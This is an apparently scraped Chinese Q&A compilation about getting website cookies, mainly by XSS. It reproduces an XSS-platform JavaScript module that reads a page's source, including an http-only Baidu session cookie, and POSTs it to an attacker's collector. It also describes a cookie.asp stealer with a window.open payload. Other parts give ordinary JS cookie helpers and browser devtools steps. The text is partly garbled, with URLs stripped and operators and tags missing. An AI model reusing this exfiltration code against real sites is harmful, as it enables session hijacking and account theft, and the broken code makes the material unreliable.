本文目录一览:
- 1、如何通过 XSS 获取受 http-only さcookie
- 2、xss 怎么获取用户cookie
- 3、js中如何获取Cookies的值
- 4、利用XSS漏洞,用Python编写脚本获取目标服务器的cookie!!!本人在做测试
- 5、cookie怎么获取呢?
- 6、如何使用xss平台盗取cookie
如何通过 XSS 获取受 http-only さcookie
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = ';id={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=;/script
xss 怎么获取用户cookie
XSS获取cookie并利用 获取cookie利用代码cookie.asp xx 把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:。 XSS构造语句 window.open('.
js中如何获取Cookies的值
首先JS设置cookie:
假设在A页面中要保存变量username的值("jack")到cookie中,key值为name,则相应的JS代码为:
document.cookie="name="+username;
JS读取cookie:
var username=document.cookie.split(";")[0].split("=")[1];
function setCookie(name,value)
{
var Days = 30;
var exp = new Date();
exp.setTime(exp.getTime() + Days*24*60*60*1000);
document.cookie = name +"="+ escape (value) +";expires=" + exp.toGMTString();
}
读取cookies
function getCookie(name)
{
var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
if(arr=document.cookie.match(reg))
return unescape(arr[2]);
else
return null;
}
扩展资料
服务器可以利用Cookies包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。Cookies最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookies的功用。
另一个重要应用场合是“购物车”之类处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。
利用XSS漏洞,用Python编写脚本获取目标服务器的cookie!!!本人在做测试
亲 cookie 在客户端上 服务器是不会保留的
况且你说你获取自己的cookie也没意义
cookie怎么获取呢?
按f12打开控制台。在name上点击右键,勾选domain。domain和所访问网页域名一样的才行。点击域名相同的一个,弹出的小窗拉到中间,就可以看见cookie的账号。
1、按f12打开控制台。
2、在name上点击右键,勾选domain。
3、domain和所访问网页域名一样的才行。
4、点击域名相同的一个,弹出的小窗拉到中间,可以看见cookie的值。
5、可以选中复制它就可以获取Cookie了。
登录的网站才访问网页时网站会验证cookie信息,以确定当前用户是否登录,所以在采集这类网站的数据时,需要同步发送cookie数据,确保网站验证cookie可以成功。
cookie如何来?可以使用抓包工具,然后打开浏览器实现目标采集网站的登录操作,然后再抓包工具中将记录的cookie拷贝出来,粘贴到你所使用的采集软件中,或者利用采集软件直接实现登录操作。
如何使用xss平台盗取cookie
截取的是你的网站的 xss真正的原理是将代码插入到某个网页里面,当浏览器访问这个网页的时候,就会执行你写的代码。如果这个代码具有获取cookies的功能,即可获得当前页面的cookies 然而不同的网站cookies是不同的,也是不允许互相访问的。